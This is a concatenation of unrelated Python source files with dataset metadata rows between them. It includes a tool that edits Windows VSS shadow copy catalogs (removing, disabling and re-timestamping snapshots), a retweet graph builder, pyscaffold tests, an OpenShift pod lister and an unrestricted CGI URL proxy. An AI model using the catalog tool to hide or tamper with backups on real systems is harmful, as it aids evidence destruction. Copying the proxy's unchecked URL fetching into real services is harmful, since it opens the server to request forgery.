('unknown_empty', c_char * 40)
)
def __init__(self):
self.catalog_entry_type = 0x03
self.ntfs_file_reference = 0x0
self.allocated_size = 0x0
self.store_previous_bitmap_offset = 0x0
self.unknown = 0x0
self.unknown_empty = b'\x00'
class CatalogEntry(LittleEndianStructure):
def __init__(self):
self.enable = True
self.catalog0x02 = CatalogEntry0x02()
self.catalog0x03 = CatalogEntry0x03()
def read_catalog(f_catalog):
list_catalog_entry = []
catalog_block_header = CatalogBlockHeader()
catalog_entry = CatalogEntry()
catalog_file_offset = 0
for catalog_block_offset in [0x0, 0x4000, 0x8000, 0xc000]:
f_catalog.seek(catalog_block_offset)
f_catalog.readinto(catalog_block_header)
catalog_file_offset = catalog_file_offset + 128
if not (catalog_block_header.vssid == vss_identifier and catalog_block_header.version == 0x1 and catalog_block_header.record_type == 0x2):
exit("This file is not VSS catalog.")
while catalog_file_offset < catalog_block_offset + 0x4000 - 128:
catalog_entry_type, data = struct.unpack("<QQ", f_catalog.read(16))
f_catalog.seek(-16, 1)
if catalog_entry_type == 0x2:
catalog_entry.enable = True
f_catalog.readinto(catalog_entry.catalog0x02)
f_catalog.readinto(catalog_entry.catalog0x03)
catalog_file_offset = catalog_file_offset + 128 * 2
if all(x == y for x, y in zip(catalog_entry.catalog0x02.store_guid, catalog_entry.catalog0x03.store_guid)):
list_catalog_entry.append(copy.deepcopy(catalog_entry))
else:
guid = bytearray(len(catalog_entry.catalog0x02.store_guid))
for i in range(len(catalog_entry.catalog0x02.store_guid)):
guid[i] = catalog_entry.catalog0x02.store_guid[i]
print("Catalog Entry Type 0x02 GUID: {0}".format(str(uuid.UUID(bytes_le=bytes(guid)))))
for i in range(len(catalog_entry.catalog0x03.store_guid)):
guid[i] = catalog_entry.catalog0x03.store_guid[i]
print("Catalog Entry Type 0x03 GUID: {0}".format(str(uuid.UUID(bytes_le=bytes(guid)))))
exit(" Catalog GUID doesn't match.")
elif catalog_entry_type == 0x1 and data != 0x0:
catalog_entry.enable = False
f_catalog.readinto(catalog_entry.catalog0x02)
f_catalog.readinto(catalog_entry.catalog0x03)
catalog_file_offset = catalog_file_offset + 128 * 2
list_catalog_entry.append(copy.deepcopy(catalog_entry))
else:
f_catalog.read(128)
catalog_file_offset = catalog_file_offset + 128
return list_catalog_entry
def write_catalog(f_new_catalog, list_catalog_entry):
pass
index_catalog = 0
for catalog_offset in [0x0, 0x4000, 0x8000, 0xc000]:
buf = 0x0
if catalog_offset == 0xc000:
next_block_offset = 0x0
else:
next_block_offset = catalog_offset + 0x4000
if buf == 0:
f_new_catalog.write(CatalogBlockHeader(catalog_offset, catalog_offset, next_block_offset))
buf = buf + 128
while next_block_offset - buf > 128 * 2 and index_catalog < len(list_catalog_entry):
f_new_catalog.write(list_catalog_entry[index_catalog].catalog0x02)
f_new_catalog.write(list_catalog_entry[index_catalog].catalog0x03)
buf = buf + 128 * 2
index_catalog = index_catalog + 1
if index_catalog == len(list_catalog_entry):
break
for i in range((0x4000 - buf) // 128):
f_new_catalog.write(CatalogEntry0x00())
buf = buf + 128
def print_entry(list_catalog_entry):
epoch_as_filetime = 116444736000000000 # January 1, 1970 as MS file time
hundreds_of_nanoseconds = 10000000
index = 0
for entry in list_catalog_entry:
dt = datetime.datetime.utcfromtimestamp((entry.catalog0x02.shadow_copy_creation_time - epoch_as_filetime)/hundreds_of_nanoseconds)
if entry.enable:
enable_state = "Enable"
else:
enable_state = "Disable"
guid = bytearray(len(entry.catalog0x02.store_guid))
for i in range(len(entry.catalog0x02.store_guid)):
guid[i] = entry.catalog0x02.store_guid[i]
print("[{0}] {1}, Date: {2}, GUID: {3}".format(index, enable_state, dt, str(uuid.UUID(bytes_le=bytes(guid)))))
index = index + 1
def parse_entry_number(entry_number):
list_entry_number = []
for number in entry_number.split(','):
if not ('-' in number):
list_entry_number.append(int(number))
elif '-' in number:
start, end = number.split('-')
if int(start) >= int(end):
exit("Corrupt entry number.")
for i in range(int(start), int(end) + 1):
list_entry_number.append(int(i))
else:
exit("Corrupt entry number.")
return list_entry_number
def move_entry_internal(list_catalog_entry, entry_number, destination):
hundreds_of_nanoseconds = 10000000
list_result = []
list_entry_number = parse_entry_number(entry_number)
list_entry_number.sort()
# move
for i in range(0,destination):
if i in list_entry_number:
continue
list_result.append(list_catalog_entry[i])
for i in list_entry_number:
list_result.append(list_catalog_entry[i])
for i in range(destination, len(list_catalog_entry)):
if i in list_entry_number:
continue
list_result.append(list_catalog_entry[i])
# change meta data
index = 0
sequence_number = list_result[0].catalog0x02.sequence_number
creation_time = list_result[0].catalog0x02.shadow_copy_creation_time
for entry in list_result:
entry.catalog0x02.sequence_number = sequence_number - index
entry.catalog0x02.shadow_copy_creation_time = creation_time - hundreds_of_nanoseconds * 60 * 60 * index
index = index + 1
return list_result
def remove_entry_internal(list_catalog_entry, entry_number):
list_entry_number = parse_entry_number(entry_number)
list_entry_number.sort(reverse=True)
for i in list_entry_number:
del list_catalog_entry[i]
def enable_entry_internal(list_catalog_entry, entry_number):
list_entry_number = parse_entry_number(entry_number)
for i in list_entry_number:
list_catalog_entry[i].enable = True
list_catalog_entry[i].catalog0x02.catalog_entry_type = 0x2
list_catalog_entry[i].catalog0x03.catalog_entry_type = 0x3
def disable_entry_internal(list_catalog_entry, entry_number):
list_entry_number = parse_entry_number(entry_number)
for i in list_entry_number:
list_catalog_entry[i].enable = False
list_catalog_entry[i].catalog0x02.catalog_entry_type = 0x1
list_catalog_entry[i].catalog0x03.catalog_entry_type = 0x1
def list_entry(args):
f_catalog = open(args.catalog, "rb")
list_catalog_entry = read_catalog(f_catalog)
print_entry(list_catalog_entry)
f_catalog.close()
def move_entry(args):
f_catalog = open(args.catalog, "rb")
f_new_catalog = open(args.catalog + "_move", "wb")
list_catalog_entry = read_catalog(f_catalog)
list_result = move_entry_internal(list_catalog_entry, args.entry_number, args.destination)
print_entry(list_result)
write_catalog(f_new_catalog, list_result)
f_catalog.close()
f_new_catalog.close()
def remove_entry(args):
f_catalog = open(args.catalog, "rb")
f_new_catalog = open(args.catalog + "_remove", "wb")
list_catalog_entry = read_catalog(f_catalog)
remove_entry_internal(list_catalog_entry, args.entry_number)
print_entry(list_catalog_entry)
write_catalog(f_new_catalog, list_catalog_entry)
f_catalog.close()
f_new_catalog.close()
def enable_entry(args):
f_catalog = open(args.catalog, "rb")
f_new_catalog = open(args.catalog + "_enable", "wb")
list_catalog_entry = read_catalog(f_catalog)
enable_entry_internal(list_catalog_entry, args.entry_number)
print_entry(list_catalog_entry)
write_catalog(f_new_catalog, list_catalog_entry)
f_catalog.close()
f_new_catalog.close()
def disable_entry(args):
f_catalog = open(args.catalog, "rb")
f_new_catalog = open(args.catalog + "_disable", "wb")
list_catalog_entry = read_catalog(f_catalog)
disable_entry_internal(list_catalog_entry, args.entry_number)
print_entry(list_catalog_entry)
write_catalog(f_new_catalog, list_catalog_entry)
f_catalog.close()
f_new_catalog.close()
def main():
parser = argparse.ArgumentParser(description="Manipulate VSS snapshot catalog file. This tool expects output of vss_carver.py.")
subparsers = parser.add_subparsers(help='sub-command help', title='subcommands')
# parser.add_argument('--debug', action='store_true', default=False,
# help='debug mode if this flag is set (default: False)')
# list
parser_list = subparsers.add_parser('list', help='list -h')
parser_list.add_argument('catalog', action='store', type=str,
help='path to catalog file.')
parser_list.set_defaults(func=list_entry)
# move
parser_move = subparsers.add_parser('move', help='move -h. This manipulation will change several meta data (change shadow copy creation time, etc).')
parser_move.add_argument('catalog', action='store', type=str,
help='path to catalog file.')
parser_move.add_argument('entry_number', action='store', type=str,
help='list of entry numbers to move.')
parser_move.add_argument('destination', action='store', type=int,
help='entry number of destination.')
parser_move.set_defaults(func=move_entry)
# remove
parser_remove = subparsers.add_parser('remove', help='remove -h')
parser_remove.add_argument('catalog', action='store', type=str,
help='path to catalog file.')
parser_remove.add_argument('entry_number', action='store', type=str,
help='list of entry numbers to remove. ex) 2,3,5-8')
parser_remove.set_defaults(func=remove_entry)
# enable
parser_enable = subparsers.add_parser('enable', help='enable -h')
parser_enable.add_argument('catalog', action='store', type=str,
help='path to catalog file.')
parser_enable.add_argument('entry_number', action='store', type=str,
help='list of entry numbers to enable. ex) 2,3,5-8')
parser_enable.set_defaults(func=enable_entry)
# disable
parser_disable = subparsers.add_parser('disable', help='enable -h')
parser_disable.add_argument('catalog', action='store', type=str,
help='path to catalog file.')
parser_disable.add_argument('entry_number', action='store', type=str,
help='list of entry numbers to disable. ex) 2,3,5-8')
parser_disable.set_defaults(func=disable_entry)
# offset
# parser_disable = subparsers.add_parser('disable', help='enable -h')
# parser_disable.add_argument('catalog', action='store', type=str,
# help='path to catalog file.')
# parser_disable.add_argument('entry_number', action='store', type=str,
# help='list of entry numbers to disable. ex) 2,3,5-8')
# parser_disable.set_defaults(func=disable_entry)
args = parser.parse_args()
if hasattr(args, 'func'):
args.func(args)
else:
parser.print_help()
if __name__ == "__main__":
main()
| 38.777778 | 154 | 0.643033 | 1,838 | 15,007 | 4.927095 | 0.137106 | 0.099382 | 0.074205 | 0.021864 | 0.540526 | 0.508503 | 0.438383 | 0.387257 | 0.326193 | 0.29682 | 0 | 0.038465 | 0.258546 | 15,007 | 386 | 155 | 38.878238 | 0.775411 | 0.060438 | 0 | 0.324232 | 0 | 0.003413 | 0.110989 | 0.017244 | 0 | 0 | 0.010522 | 0 | 0 | 1 | 0.068259 | false | 0.003413 | 0.020478 | 0 | 0.136519 | 0.03413 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
621ba61eea160a3bde8e53186bebb5414bd26c3c | 7,169 | py | Python | DatabaseCreation/GraphDBCreation/Twitterutils.py | arg-hya/RumourDetection | f10d0201de679bd28b7dc20346752691caeb2795 | [
"MIT"
] | null | null | null | DatabaseCreation/GraphDBCreation/Twitterutils.py | arg-hya/RumourDetection | f10d0201de679bd28b7dc20346752691caeb2795 | [
"MIT"
] | null | null | null | DatabaseCreation/GraphDBCreation/Twitterutils.py | arg-hya/RumourDetection | f10d0201de679bd28b7dc20346752691caeb2795 | [
"MIT"
] | null | null | null | import json
# First networkx library is imported
# along with matplotlib
import networkx as nx
from pyvis.network import Network
import matplotlib.pyplot as plt
from bokeh.io import output_notebook, show, save
from bokeh.models import Range1d, Circle, ColumnDataSource, MultiLine
from bokeh.plotting import figure
from bokeh.plotting import from_networkx
from datetime import datetime
# Defining a Class
class GraphVisualization:
def __init__(self):
# visual is a list which stores all
# the set of edges that constitutes a
# graph
self.visual = []
# addEdge function inputs the vertices of an
# edge and appends it to the visual list
def addEdge(self, a, b):
temp = [a, b]
self.visual.append(temp)
# In visualize function G is an object of
# class Graph given by networkx G.add_edges_from(visual)
# creates a graph with a given list
# nx.draw_networkx(G) - plots the graph
# plt.show() - displays the graph
def visualize(self):
G = nx.Graph()
G.add_edges_from(self.visual)
print("Edges add to graph")
#nx.draw(G)
#nx.draw_networkx(G)
nx.write_gexf(G, "some_graph.gexf")
nt = Network(height='750px', width='100%')
# populates the nodes and edges data structures
nt.from_nx(G)
print("Network build done")
nt.show('nx.html')
#plt.show()
def save(self, dirPath, fileName):
G = nx.Graph()
G.add_edges_from(self.visual)
#print("Edges add to graph")
graphFilePath = dirPath + '/graph/' + fileName + '.gexf'
nx.write_gexf(G, graphFilePath)
nt = Network(height='750px', width='100%')
nt.from_nx(G)
#print("Network build done")
nt.save_graph(dirPath + '/graph/' + fileName + '.html')
def visualize1(self):
G = nx.Graph()
G.add_edges_from(self.visual)
print("Edges add to graph")
# Choose a title!
title = 'Game of Thrones Network'
# Establish which categories will appear when hovering over each node
HOVER_TOOLTIPS = [("Character", "@index")]
# Create a plot — set dimensions, toolbar, and title
plot = figure(tooltips=HOVER_TOOLTIPS,
tools="pan,wheel_zoom,save,reset", active_scroll='wheel_zoom',
x_range=Range1d(-10.1, 10.1), y_range=Range1d(-10.1, 10.1), title=title)
# Create a network graph object with spring layout
# https://networkx.github.io/documentation/networkx-1.9/reference/generated/networkx.drawing.layout.spring_layout.html
print("plot initialized")
network_graph = from_networkx(G, nx.spring_layout, scale=10, center=(0, 0))
print("Network imported")
# Set node size and color
network_graph.node_renderer.glyph = Circle(size=15, fill_color='skyblue')
print("Network rendered")
# Set edge opacity and width
network_graph.edge_renderer.glyph = MultiLine(line_alpha=0.5, line_width=1)
# Add network graph to the plot
plot.renderers.append(network_graph)
print("Graph appended")
show(plot)
# save(plot, filename=f"{title}.html")
IdtoTimeMap = {}
rootID = 59736485
def convertTwitterTime(time_val) :
new_datetime = datetime.strftime(datetime.strptime(time_val, '%a %b %d %H:%M:%S +0000 %Y'), '%Y-%m-%d %H:%M:%S')
timestamp = datetime.timestamp(datetime.strptime(new_datetime, '%Y-%m-%d %H:%M:%S'))
return timestamp
def test() :
filePath = 'D:/Twitter/FakeNewsNet-master/FakeNewsNet-master/code/fakenewsnet_dataset/politifact/fake/politifact14745/retweets/929507659073687552.json'
with open(filePath) as f:
retweet_dict = json.load(f)
for retweet in retweet_dict['retweets'] :
root_time_val = retweet['retweeted_status']['created_at']
print(root_time_val)
break
IdtoTimeMap[rootID] = convertTwitterTime(root_time_val)
print(IdtoTimeMap[rootID])
def createIdtoTimeMap() :
filePath = 'D:/Twitter/FakeNewsNet-master/FakeNewsNet-master/code/fakenewsnet_dataset/politifact/fake/politifact14745/retweets/929507659073687552.json'
with open(filePath) as f:
retweet_dict = json.load(f)
print("Json loaded")
for retweet in retweet_dict['retweets']:
root_time_val = retweet['retweeted_status']['created_at']
print(root_time_val)
break
IdtoTimeMap[rootID] = convertTwitterTime(root_time_val)
print("Root timestamp = ", IdtoTimeMap[rootID])
for retweet in retweet_dict['retweets']:
id = retweet['user']['id']
time_val = retweet['created_at']
print(time_val)
IdtoTimeMap[id] = convertTwitterTime(time_val)
def getLevelfromTime(timestamp) :
#print("timestamp = ", timestamp)
level = (timestamp - IdtoTimeMap[rootID])
print("level = ", level)
return level / 5000
pos = 1
def addDistantEdge(G, a, b) :
#if b not in IdtoTimeMap:
# return
#print(type(b))
#print((IdtoTimeMap[40708919]))
#print(IdtoTimeMap)
timestamp = IdtoTimeMap[int(b)]
level = getLevelfromTime(timestamp)
start = a
global pos
for i in range(0,int(level)) :
end = pos
G.addEdge(start, end)
start = pos
pos = pos + 1
G.addEdge(start, b)
print("Pos = ", pos)
def makeGraph() :
createIdtoTimeMap()
# Driver code
G = GraphVisualization()
filePath = 'Id2Followers.json'
with open(filePath) as f:
ids_dict = json.load(f)
print("Id2Followers Json loaded")
for key in ids_dict :
# Iterating over values
#print("Building graph for ID = ", key)
for id, friends in ids_dict.items():
# Add connection between retweet IDs
if (key in friends):
print("Edge detected")
G.addEdge(key, id)
'''
counter = 0
for id, friends in ids_dict.items():
counter = counter + 1
if counter == 5 :
break
print("Building graph for friends of ID = ", id)
for frnd in friends :
count = 0
for id_1, friends_1 in ids_dict.items():
if(count == 1) :
break
if (frnd in friends_1) & (id != id_1) :
count = count + 1
#print("detected")
G.addEdge(frnd, id_1)
G.addEdge(id, frnd)
#if count != 0 :
# print(count)
'''
# Add conncetion with primary
for id, friends in ids_dict.items():
if (59736485 in friends):
print("[Primary] Edge detected")
else :
print("Adding distand edge = ", id)
addDistantEdge(G, 59736485, id)
#G.addEdge(59736485, id)
print("Graph building done...")
G.visualize()
print("Program Ended")
| 33.189815 | 156 | 0.597712 | 863 | 7,169 | 4.87022 | 0.273465 | 0.01832 | 0.015703 | 0.012372 | 0.269331 | 0.259576 | 0.221984 | 0.203426 | 0.203426 | 0.188199 | 0 | 0.029668 | 0.294741 | 7,169 | 215 | 157 | 33.344186 | 0.801424 | 0.17771 | 0 | 0.266667 | 0 | 0.016667 | 0.172765 | 0.060188 | 0 | 0 | 0 | 0 | 0 | 1 | 0.091667 | false | 0 | 0.083333 | 0 | 0.2 | 0.175 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
621c46c129624beed8792b89b80e5ed6f1ce1412 | 5,637 | py | Python | tests/test_utils.py | HolgerPeters/pyscaffold | 04f3435fbe882041bf5860e164d07f8bd148a764 | [
"BSD-3-Clause"
] | null | null | null | tests/test_utils.py | HolgerPeters/pyscaffold | 04f3435fbe882041bf5860e164d07f8bd148a764 | [
"BSD-3-Clause"
] | null | null | null | tests/test_utils.py | HolgerPeters/pyscaffold | 04f3435fbe882041bf5860e164d07f8bd148a764 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import tempfile
import pytest
import six
from pyscaffold import runner, utils
from pyscaffold.structure import create_structure
from .fixtures import tmpdir # noqa
def test_chdir():
curr_dir = os.getcwd()
try:
temp_dir = tempfile.mkdtemp()
with utils.chdir(temp_dir):
new_dir = os.getcwd()
assert new_dir == os.path.realpath(temp_dir)
assert curr_dir == os.getcwd()
finally:
os.rmdir(temp_dir)
def test_is_valid_identifier():
bad_names = ["has whitespace",
"has-hyphen",
"has_special_char$",
"1starts_with_digit"]
for bad_name in bad_names:
assert not utils.is_valid_identifier(bad_name)
valid_names = ["normal_variable_name",
"_private_var",
"_with_number1"]
for valid_name in valid_names:
assert utils.is_valid_identifier(valid_name)
def test_make_valid_identifier():
assert utils.make_valid_identifier("has whitespaces ") == "has_whitespaces"
assert utils.make_valid_identifier("has-hyphon") == "has_hyphon"
assert utils.make_valid_identifier("special chars%") == "special_chars"
assert utils.make_valid_identifier("UpperCase") == "uppercase"
with pytest.raises(RuntimeError):
utils.make_valid_identifier("def")
def test_safe_set():
args = ["my-project", "-u", "http://www.blue-yonder.com/"]
args = runner.parse_args(args)
utils.safe_set(args, "new_option", "value")
assert args.new_option == "value"
utils.safe_set(args, "license", "my license")
assert args.license == "my license"
utils.safe_set(args, "url", "http://www.python.org/")
assert args.url == "http://www.blue-yonder.com/"
def test_safe_get():
args = ["my-project", "-u", "http://www.blue-yonder.com/"]
args = runner.parse_args(args)
assert utils.safe_get(args, "url") == "http://www.blue-yonder.com/"
assert utils.safe_get(args, "non_existent") is None
def test_list2str():
classifiers = ['Development Status :: 4 - Beta',
'Programming Language :: Python']
class_str = utils.list2str(classifiers, indent=len("classifiers = ") + 1)
exp_class_str = """\
['Development Status :: 4 - Beta',
'Programming Language :: Python']"""
assert class_str == exp_class_str
classifiers = ['Development Status :: 4 - Beta']
class_str = utils.list2str(classifiers, indent=len("classifiers = ") + 1)
assert class_str == "['Development Status :: 4 - Beta']"
classifiers = []
class_str = utils.list2str(classifiers, indent=len("classifiers = ") + 1)
assert class_str == "[]"
classifiers = ['Development Status :: 4 - Beta']
class_str = utils.list2str(classifiers, brackets=False)
assert class_str == "'Development Status :: 4 - Beta'"
class_str = utils.list2str(classifiers, brackets=False, quotes=False)
assert class_str == "Development Status :: 4 - Beta"
class_str = utils.list2str(classifiers, brackets=True, quotes=False)
assert class_str == "[Development Status :: 4 - Beta]"
def test_exceptions2exit():
@utils.exceptions2exit([RuntimeError])
def func(_):
raise RuntimeError("Exception raised")
with pytest.raises(SystemExit):
func(1)
def test_ObjKeeper():
@six.add_metaclass(utils.ObjKeeper)
class MyClass(object):
pass
obj1 = MyClass()
obj2 = MyClass()
assert MyClass.instances[MyClass][0] is obj1
assert MyClass.instances[MyClass][1] is obj2
def test_capture_objs():
import string
ref = utils.capture_objs(string.Template)
my_template = string.Template("")
assert my_template is ref[-1]
def test_git2pep440():
ver = "1.0-1-gacf677d"
assert utils.git2pep440(ver) == "1.0.post0.dev1+gacf677d"
ver = "2.0"
assert utils.git2pep440(ver) == "2.0"
ver = "2.0-2-g68b1b7b-dirty"
assert utils.git2pep440(ver) == "2.0.post0.dev2+g68b1b7b.dirty"
ver = "3.0-dirty"
assert utils.git2pep440(ver) == "3.0+dirty"
with pytest.raises(RuntimeError):
ver = "3.0-dirty-1-1-1"
utils.git2pep440(ver)
def test_levenshtein():
s1 = "born"
s2 = "burn"
assert utils.levenshtein(s1, s2) == 1
s2 = "burnt"
assert utils.levenshtein(s1, s2) == 2
assert utils.levenshtein(s2, s1) == 2
s2 = ""
assert utils.levenshtein(s2, s1) == 4
def test_utf8_encode():
s_in = six.u('äüä')
s_out = utils.utf8_encode(s_in)
assert isinstance(s_out, six.string_types)
def test_utf8_decode():
s_in = "äüä"
s_out = utils.utf8_decode(s_in)
assert isinstance(s_out, six.string_types)
def test_stash():
filename = 'my_file'
content = 'this is my file'
other_content = 'this is not my file'
with open(filename, 'w') as fh:
fh.write(content)
with utils.stash(filename):
with open(filename, 'w') as fh:
fh.write(other_content)
with open(filename) as fh:
file_content = fh.read()
assert file_content == other_content
with open(filename) as fh:
file_content = fh.read()
assert file_content == content
def test_get_files(tmpdir): # noqa
struct = {'subdir': {'script.py': '#Python script...'},
'root_script.py': '#Root Python script...'}
create_structure(struct)
files = utils.get_files("*.py")
assert 'root_script.py' in files
assert 'subdir/script.py' not in files
files = utils.get_files("**.py")
assert 'root_script.py' in files
assert 'subdir/script.py' in files
| 30.972527 | 79 | 0.645024 | 728 | 5,637 | 4.821429 | 0.229396 | 0.029915 | 0.041026 | 0.050142 | 0.460969 | 0.380912 | 0.345014 | 0.296581 | 0.280627 | 0.250427 | 0 | 0.026364 | 0.219443 | 5,637 | 181 | 80 | 31.143646 | 0.771364 | 0.009225 | 0 | 0.145833 | 0 | 0 | 0.204085 | 0.009317 | 0 | 0 | 0 | 0 | 0.263889 | 1 | 0.111111 | false | 0.006944 | 0.055556 | 0 | 0.173611 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
621dda42b1b439d1af79df330e9e3b18b1217f57 | 1,110 | py | Python | examples/list-pods-async.py | GrahamDumpleton/openshift3-python-library | 9996041ea1d529b07a4dd1394ed49f68dc3967be | [
"BSD-2-Clause"
] | null | null | null | examples/list-pods-async.py | GrahamDumpleton/openshift3-python-library | 9996041ea1d529b07a4dd1394ed49f68dc3967be | [
"BSD-2-Clause"
] | null | null | null | examples/list-pods-async.py | GrahamDumpleton/openshift3-python-library | 9996041ea1d529b07a4dd1394ed49f68dc3967be | [
"BSD-2-Clause"
] | null | null | null | import asyncio
import powershift.endpoints as endpoints
import powershift.resources as resources
client = endpoints.AsyncClient()
async def run_query():
projects = await client.oapi.v1.projects.get()
#print(projects)
#print(resources.dumps(projects, indent=4, sort_keys=True))
#print()
for project in projects.items:
namespace = project.metadata.name
print('namespace=%r' % namespace)
pods = await client.api.v1.namespaces(namespace=namespace).pods.get()
for pod in pods.items:
names.append(pod.metadata.name)
print(' pod=%r' % pod.metadata.name)
# We are given the pod definition already, but this is just to
# show how you can also query by the name of the pod.
pod = await client.api.v1.namespaces(namespace=namespace).pods(name=pod.metadata.name).get()
print(' resource_version=%r' % pod.metadata.resource_version)
#print()
#print(resources.dumps(pods, indent=4, sort_keys=True))
loop = asyncio.get_event_loop()
loop.run_until_complete(run_query())
| 28.461538 | 105 | 0.667568 | 144 | 1,110 | 5.076389 | 0.430556 | 0.065663 | 0.06156 | 0.04104 | 0.183311 | 0.131327 | 0.131327 | 0.131327 | 0 | 0 | 0 | 0.005794 | 0.222523 | 1,110 | 38 | 106 | 29.210526 | 0.841251 | 0.228829 | 0 | 0 | 0 | 0 | 0.057715 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.176471 | 0 | 0.176471 | 0.176471 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
621ef2979ee7e4768b8c9811a39438006a24e1a0 | 2,086 | py | Python | tests/data23/recipe-286160.py | JohannesBuchner/pystrict3 | f442a89ac6a23f4323daed8ef829d8e9e1197f90 | [
"BSD-2-Clause"
] | 1 | 2020-06-05T08:53:26.000Z | 2020-06-05T08:53:26.000Z | tests/data23/recipe-286160.py | JohannesBuchner/pystrict3 | f442a89ac6a23f4323daed8ef829d8e9e1197f90 | [
"BSD-2-Clause"
] | 1 | 2020-06-04T13:47:19.000Z | 2020-06-04T13:47:57.000Z | tests/data23/recipe-286160.py | JohannesBuchner/pystrict3 | f442a89ac6a23f4323daed8ef829d8e9e1197f90 | [
"BSD-2-Clause"
] | 1 | 2020-11-07T17:02:46.000Z | 2020-11-07T17:02:46.000Z | #!/usr/bin/python
# v0.01
# cgiproxy.py
# Copyright Michael Foord
# Not for use in commercial projects without permission. (Although permission will probably be given).
# If you use this code in a project then please credit me and include a link back.
# If you release the project then let me know (and include this message with my code !)
# No warranty express or implied for the accuracy, fitness to purpose or otherwise for this code....
# Use at your own risk !!!
# E-mail or michael AT foord DOT me DOT uk
# Maintained at www.voidspace.org.uk/atlantibots/pythonutils.html
import sys
import cgi
import urllib.request, urllib.error, urllib.parse
sys.stderr = sys.stdout
HOMEPAGE = 'www.google.co.uk'
######################################################
def getform(valuelist, theform, notpresent=''):
"""This function, given a CGI form, extracts the data from it, based on
valuelist passed in. Any non-present values are set to '' - although this can be changed.
(e.g. to return None so you can test for missing keywords - where '' is a valid answer but to have the field missing isn't.)"""
data = {}
for field in valuelist:
if field not in theform:
data[field] = notpresent
else:
if type(theform[field]) != type([]):
data[field] = theform[field].value
else:
values = [x.value for x in theform[field]] # allows for list type values
data[field] = values
return data
def pagefetch(thepage):
req = urllib.request.Request(thepage)
u = urllib.request.urlopen(req)
data = u.read()
return data
###################################################
if __name__ == '__main__':
form = cgi.FieldStorage()
data = getform(['url'],form)
if not data['url']: data['url'] = HOMEPAGE
print("Content-type: text/html") # this is the header to the server
print() # so is this blank line
test = pagefetch('http://' + data['url'])
print(test)
| 32.59375 | 131 | 0.603547 | 278 | 2,086 | 4.5 | 0.514388 | 0.031175 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001927 | 0.253595 | 2,086 | 63 | 132 | 33.111111 | 0.801541 | 0.441994 | 0 | 0.133333 | 0 | 0 | 0.063953 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.1 | 0 | 0.233333 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
621fd513a88d7b05361f336712c14f6c6163f5f9 | 572 | py | Python | helpers/filter_msa.py | carnevale-lab/torch_ising_vae | f2b7b8581cf416e907c57f16b5eb7a9d86b31644 | [
"CC0-1.0"
] | null | null | null | helpers/filter_msa.py | carnevale-lab/torch_ising_vae | f2b7b8581cf416e907c57f16b5eb7a9d86b31644 | [
"CC0-1.0"
] | null | null | null | helpers/filter_msa.py | carnevale-lab/torch_ising_vae | f2b7b8581cf416e907c57f16b5eb7a9d86b31644 | [
"CC0-1.0"
] | null | null | null | #!/usr/bin/env python3
import numpy as np
from mi3gpu.utils import seqload
from mi3gpu.utils import seqtools
from numpy.random import randint
import sys, os
s = seqload.loadSeqs(sys.argv[1])[0]
cutoff = 1-float(sys.argv[2])
L = s.shape[1]
inds = []
out_seq = []
while s.shape[0] != 0:
ind = randint(s.shape[0])
out_seq.append(s[ind].copy()) # no ref to s
s = s[np.sum(s == s[ind,:], axis=1)/float(L) < cutoff,:]
print(s.shape, file=sys.stderr)
with os.fdopen(sys.stdout.fileno(), 'wb', closefd=False) as fp:
seqload.writeSeqs(fp, np.array(out_seq))
| 26 | 63 | 0.664336 | 102 | 572 | 3.696078 | 0.509804 | 0.06366 | 0.079576 | 0.111406 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024896 | 0.157343 | 572 | 21 | 64 | 27.238095 | 0.757261 | 0.057692 | 0 | 0 | 0 | 0 | 0.003724 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.294118 | 0 | 0.294118 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62209a22393da7cbf79c4e663695c5b9383b285b | 14,659 | py | Python | wave_funcs.py | csherwood-usgs/waves | 7ec505d4d73a7bb6c6959a59083dd99b25fae572 | [
"CC0-1.0"
] | null | null | null | wave_funcs.py | csherwood-usgs/waves | 7ec505d4d73a7bb6c6959a59083dd99b25fae572 | [
"CC0-1.0"
] | null | null | null | wave_funcs.py | csherwood-usgs/waves | 7ec505d4d73a7bb6c6959a59083dd99b25fae572 | [
"CC0-1.0"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
